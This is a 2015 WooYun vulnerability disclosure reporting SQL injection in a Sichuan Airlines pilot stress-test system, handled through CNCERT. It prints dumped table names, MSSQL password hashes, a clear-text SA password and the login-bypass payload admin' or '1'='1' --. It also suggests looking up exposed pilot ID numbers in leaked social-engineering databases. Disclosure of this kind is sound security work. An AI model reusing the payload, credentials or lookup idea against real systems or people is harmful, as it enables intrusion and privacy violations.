当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148883

漏洞标题:航空安全之四川航空某系统SQL注入(导致大量飞行员身份证信息泄露)

相关厂商:四川航空

漏洞作者: 残冰

提交时间:2015-10-23 14:47

修复时间:2015-12-11 17:02

公开时间:2015-12-11 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

是否20RK??

详细说明:

主站这个:http://**.**.**.**
飞行员心里压力测试系统
SQL注入点,表单注入:

http://**.**.**.**/
http://**.**.**.**/admin


1.jpg


2.jpg

3.jpg


Database: MHCP
[23 tables]
+---------------+
| Admin_Class |
| Admin_Group |
| Admin_History |
| Admin_JiLu |
| Config |
| Dc_Test |
| Dc_Ti |
| Dc_admin |
| Dc_grade |
| Dc_input |
| Dc_rule |
| Dc_ruleMX |
| Dc_user |
| Down_Record |
| Ft_user |
| Ggao |
| Menu |
| MessageUser |
| News |
| T_Ti |
| admin_info |
| dtproperties |
| ft_UserGroup |
+---------------+


SA账号和密码:password: 123456a

database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01002cc5f3a8b15b1cc3965f9bfe1934855dbdeb0db14b15c9da
header: 0x0100
salt: 2cc5f3a8
mixedcase: b15b1cc3965f9bfe1934855dbdeb0db14b15c9da
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100638decd70c53c4e70e8cc0543b32cc904a31b23ca74d3d5b
header: 0x0100
salt: 638decd7
mixedcase: 0c53c4e70e8cc0543b32cc904a31b23ca74d3d5b
[*] sa [1]:
password hash: 0x01002b38d4fa47b849dc217f22a0cff4947a3a5731299aaa19fb
header: 0x0100
salt: 2b38d4fa
mixedcase: 47b849dc217f22a0cff4947a3a5731299aaa19fb
clear-text password: 123456a


测试出大量的飞行员身份证信息,姓名由于编码问题无法显示出来

4.jpg


利用身份证号码直接可查询资料或在公开社工裤提取其它信息:

sc.jpg


万能密码绕过登陆:

admin' or '1'='1' --


s.jpg


11.jpg


22.jpg


目录遍历:

**.**.**.**/


list.jpg


list1.jpg


漏洞证明:

已证明;

修复方案:

参数化,过滤

版权声明:转载请注明来源 残冰@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-27 17:01

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置.

最新状态:

暂无